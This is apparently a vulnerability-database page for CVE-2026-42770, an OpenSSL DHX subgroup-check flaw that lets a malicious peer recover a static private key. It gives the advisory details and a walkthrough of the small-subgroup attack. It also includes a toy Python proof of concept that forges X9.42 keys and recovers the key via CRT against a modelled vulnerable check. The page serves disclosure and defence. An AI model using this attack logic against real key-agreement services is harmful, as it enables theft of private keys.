CVE-2026-42770
Published: 09 June 2026
Summary
CVE-2026-42770 is a low-severity Missing Cryptographic Step (CWE-325) vulnerability in OpenSSL. Its CVSS 3.1 base score is 3.7 (Low).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploitation for Credential Access (T1212). The CVE is ranked at the 17.3rd percentile by exploit likelihood (below the median) and is not currently listed in the CISA KEV catalog.
Deeper analysis
CVE-2026-42770 is a missing-validation flaw in OpenSSL's handling of Diffie-Hellman X9.42 (DHX) keys: the subgroup check that is supposed to confine a peer's public value to the intended q-order subgroup is performed against the wrong q. When EVP_PKEY_derive_set_peer() receives a DHX peer key, the membership check Y^q ≡ 1 (mod p) uses the peer-supplied q rather than the local key's q, and the subsequent domain-parameter comparison does not compare q at all, so the peer is free to choose whichever q makes its Y pass. The issue affects the FIPS modules in OpenSSL 4.0, 3.6, 3.5, 3.4, and 3.0 and is tracked as CWE-325 (Missing Cryptographic Step) with a CVSS 3.1 score of 3.7.
An attacker who can supply a DHX peer key to a victim performing key derivation with a static private key x presents an X9.42 structure containing the victim's p and g, a forged q = r where r is a small prime factor of the cofactor h = (p−1)/q, and a public value Y of order r. Because Y^r ≡ 1 (mod p), the flawed check passes, and the derived shared secret Y^x mod p can take only r distinct values; an attacker who can learn the secret, or anything keyed from it in an interactive protocol, therefore learns x mod r. Repeating the exchange for each small prime factor of the cofactor and combining the residues with the Chinese Remainder Theorem recovers x modulo the product of those factors, which is the whole private key once that product exceeds q. Since each exchange leaks only a residue of the same key, the attack needs a private key that is reused across many exchanges.
The realistic attack surface is described as narrow: primarily CMP deployments that use long-lived RA/CA DHX keys, and bespoke enterprise or government applications employing static X9.42 keys in interactive protocols. The issue was therefore rated Low severity. Public references consist of five OpenSSL commits that implement the corrected subgroup check and parameter validation. The current EPSS score remains at 0.0001 with no material increase observed.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2026-35487
Vulnerability details
Issue summary: When EVP_PKEY_derive_set_peer() is called with a DHX (X9.42) peer key, the peer key is not properly checked for the subgroup membership.
Impact summary: A malicious peer which presents an X9.42 key carrying the victim's p and g parameters, a forged q = r (a small prime factor of the cofactor (p−1)/q_local), and a public value Y of order r can recover the victim's private key after a small number of key exchange attempts.
When EVP_PKEY_derive_set_peer() is called with a DHX (X9.42) peer key, the subgroup membership check Y^q ≡ 1 (mod p) is performed using the peer's own q parameter, not the local key's q. The peer's domain parameters are then matched against the domain parameters of the private key, but the value of q is not compared. A malicious peer who presents an X9.42 key carrying the victim's p, g, a forged q = r (a small prime factor of the cofactor), and a public value Y of order r passes all checks. The shared secret then takes only r distinct values, leaking priv mod r. Repeating for each small-prime factor of the cofactor and combining via CRT recovers the full private key (Lim–Lee / small-subgroup-confinement attack).
The realistic attack surface is narrow: principally CMP deployments with long-lived RA/CA DHX keys and bespoke enterprise or government applications using X9.42 DHX static keys with interactive protocols, and therefore this issue was assigned Low severity.
The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are affected by this issue.
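The following is an added worked example, not OpenSSL code, that reproduces the small-subgroup confinement described in both the "Deeper analysis" section and the advisory text above on a deliberately tiny constructed group. The parameters P = 2311 and Q = 11 are assumptions chosen so that the cofactor H = (P−1)/Q = 210 = 2·3·5·7 has several small prime factors; derive_vulnerable() and derive_fixed() are constructed models of the check before and after the fix as the advisory describes it, not OpenSSL's own functions, and the "oracle" that hands the attacker the shared secret stands in for whatever interactive protocol would let candidate secrets be tested.

```python
"""Toy small-subgroup confinement against an X9.42 (DHX) static key.
Added example with constructed parameters; not OpenSSL code."""
from dataclasses import dataclass

P, Q = 2311, 11            # constructed toy parameters (both prime)
H = (P - 1) // Q           # cofactor, 210 = 2 * 3 * 5 * 7


def element_of_order(order):
    """Return an element of Z_P^* with exactly the given prime order."""
    assert (P - 1) % order == 0
    a = 2
    while True:
        y = pow(a, (P - 1) // order, P)
        if y != 1:         # y^order == 1 and order is prime, so ord(y) == order
            return y
        a += 1


G = element_of_order(Q)    # generator of the intended q-order subgroup


@dataclass(frozen=True)
class DHXKey:
    """X9.42 public key: domain parameters p, g, q plus public value y."""
    p: int
    g: int
    q: int
    y: int


def derive_vulnerable(local_q, x, peer):
    """Flawed check modelled on the advisory: Y^q == 1 is tested with the
    peer's q and the parameter comparison omits q, so a peer may pick a q
    matching a public value of any small order that divides the cofactor."""
    if (peer.p, peer.g) != (P, G):
        raise ValueError("domain parameter mismatch")
    if pow(peer.y, peer.q, P) != 1:            # bug: peer.q instead of local_q
        raise ValueError("peer public value not in subgroup")
    return pow(peer.y, x, P)


def derive_fixed(local_q, x, peer):
    """Corrected check: q is compared as well, and the membership test uses
    the local key's q, so only elements of the intended subgroup pass."""
    if (peer.p, peer.g, peer.q) != (P, G, local_q):
        raise ValueError("domain parameter mismatch")
    if pow(peer.y, local_q, P) != 1:
        raise ValueError("peer public value not in subgroup")
    return pow(peer.y, x, P)


def small_prime_factors(n):
    """Distinct prime factors of n by trial division (enough for a toy cofactor)."""
    factors, d = [], 2
    while d * d <= n:
        if n % d == 0:
            factors.append(d)
            while n % d == 0:
                n //= d
        d += 1
    if n > 1:
        factors.append(n)
    return factors


def crt(residues, moduli):
    """Chinese Remainder Theorem for pairwise coprime moduli: (value, product)."""
    m_all = 1
    for m in moduli:
        m_all *= m
    total = 0
    for a, m in zip(residues, moduli):
        m_i = m_all // m
        total += a * m_i * pow(m_i, -1, m)
    return total % m_all, m_all


def recover_private_key(derive, x_victim):
    """Attacker side. `derive` models a victim that runs key agreement with
    its static private key and lets the attacker learn the shared secret
    (in practice through something keyed from it, hence 'interactive').
    Returns (x mod M, M) with M = product of the small cofactor primes;
    here M = 210 > Q, so the whole private key is recovered."""
    residues, moduli = [], []
    for r in small_prime_factors(H):
        y_r = element_of_order(r)
        forged = DHXKey(p=P, g=G, q=r, y=y_r)   # victim's p, g; forged q = r
        secret = derive(Q, x_victim, forged)   # Y^x mod p: only r possible values
        residues.append(next(j for j in range(r) if pow(y_r, j, P) == secret))
        moduli.append(r)
    return crt(residues, moduli)


if __name__ == "__main__":
    x = 7                                       # victim's static key, 1 <= x < Q
    print(recover_private_key(derive_vulnerable, x))   # (7, 210)
    try:
        recover_private_key(derive_fixed, x)
    except ValueError as err:
        print("fixed check rejects the forged key:", err)
```

Requires Python 3.8+ for the modular inverse form of pow(). Against the vulnerable check, four exchanges (one per small prime factor of the cofactor) suffice to recover x; against the fixed check, the very first forged key is rejected because its q differs from the local q and its Y is not in the local q-order subgroup.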
Related Threats
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The CVE enables private-key recovery through a malicious DHX peer key, which maps directly to Exploitation for Credential Access (T1212).
Hardening callouts (derived)
Configuration rules from DISA STIG baselines that reduce the attack surface for weaknesses of the type cited by this CVE (CWE-325), mapped transitively CVE→CWE→STIG. These are weakness-class mappings, not fixes for this CVE: enabling FIPS mode does not remove the flaw, because the affected code is in the OpenSSL FIPS modules themselves, and the shadow-password hashing rule (V-248535) concerns password storage rather than DH key agreement. Patching OpenSSL to a release containing the corrective commits is the actual remediation.
Oracle Linux 8 (2 rules)
- V-248524 OL 8 must implement NIST FIPS-validated cryptography for the following: To provision digital signatures, to generate cryptographic hashes, and to protect data requiring data-at-rest protections in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, and standards. via CWE-325
- V-248535 The OL 8 shadow password suite must be configured to use a sufficient number of hashing rounds. via CWE-325
Oracle Linux 9 (1 rule)
- V-271454 OL 9 must enable FIPS mode. via CWE-325
RHEL 7 (1 rule)
- V-204497 The Red Hat Enterprise Linux operating system must implement NIST FIPS-validated cryptography for the following: to provision digital signatures, to generate cryptographic hashes, and to protect data requiring data-at-rest protections in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, and standards. via CWE-325
RHEL 8 (1 rule)
- V-230223 RHEL 8 must implement NIST FIPS-validated cryptography for the following: To provision digital signatures, to generate cryptographic hashes, and to protect data requiring data-at-rest protections in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, and standards. via CWE-325
Ubuntu 22.04 (1 rule)
- V-260650 Ubuntu 22.04 LTS must implement NIST FIPS-validated cryptography to protect classified information and for the following: To provision digital signatures, to generate cryptographic hashes, and to protect unclassified information requiring confidentiality and cryptographic protection in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, and standards. via CWE-325
Ubuntu 24.04 (1 rule)
- V-270744 Ubuntu 24.04 LTS must implement NIST FIPS-validated cryptography to protect classified information and for the following: To provision digital signatures, to generate cryptographic hashes, and to protect unclassified information requiring confidentiality and cryptographic protection in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, and standards. via CWE-325